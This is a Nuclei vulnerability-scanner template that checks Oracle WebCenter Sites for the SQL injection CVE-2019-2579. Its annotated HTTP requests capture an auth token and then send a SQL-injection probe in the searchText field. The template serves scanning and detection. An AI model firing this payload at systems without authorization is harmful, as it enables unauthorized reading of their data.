# Nuclei template for CVE-2019-2579: a SQL-injection check against the
# "WebReferences" admin utility of Oracle WebCenter Sites (affected release
# recorded below as 12.2.1.3.0). Remediation is the Oracle Critical Patch
# Update that addresses CVE-2019-2579.
id: CVE-2019-2579

info:
  name: Oracle WebCenter Sites - SQL Injection
  author: leovalcante
  severity: medium
  description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows low privileged attacker
    with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
  reference:
    - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
    - https://github.com/Leovalcante/wcs_scanner
  classification:
    # PR:L in the vector records that a low-privileged account is needed; the
    # template itself sends no credentials, so it presumably relies on whatever
    # session the operator supplies — confirm against the tool's options.
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2019-2579
  tags: cve,cve2019,oracle,wcs,sqli

requests:
  - raw:
      # Request 1: fetch the WebReferences page. Its body carries the
      # _authkey_ form token that the extractor below captures for reuse.
      - |
        GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
        Host: {{Hostname}}

      # Request 2: submit the search form with the captured token. The
      # searchText value is the probe the word matcher looks for in the
      # response; the same decoded string in web-server or application logs
      # is a practical detection signal for scans of this kind.
      - |
        POST /cs/ContentServer HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+

    # Cookies set by request 1 are carried into request 2 so the token and
    # session stay paired.
    cookie-reuse: true
    extractors:
      # Pulls the _authkey_ value out of the first response; "internal" keeps
      # it out of the scan output and makes it available only as {{authkey}}.
      - type: regex
        name: authkey
        part: body
        internal: true
        group: 1
        regex:
          - "NAME='_authkey_' VALUE='([0-9A-Z]+)'>"

    # Both matchers must hit: the second response has to echo the probe
    # string and the page's banner text, and return HTTP 200. This confirms
    # the endpoint is reachable and reflects the input; it is not by itself a
    # differential proof of the injection, so triage a hit accordingly.
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "value='' and '1'='0 --"
          - "Use this utility to view and manage URLs"
        condition: and

      - type: status
        status:
          - 200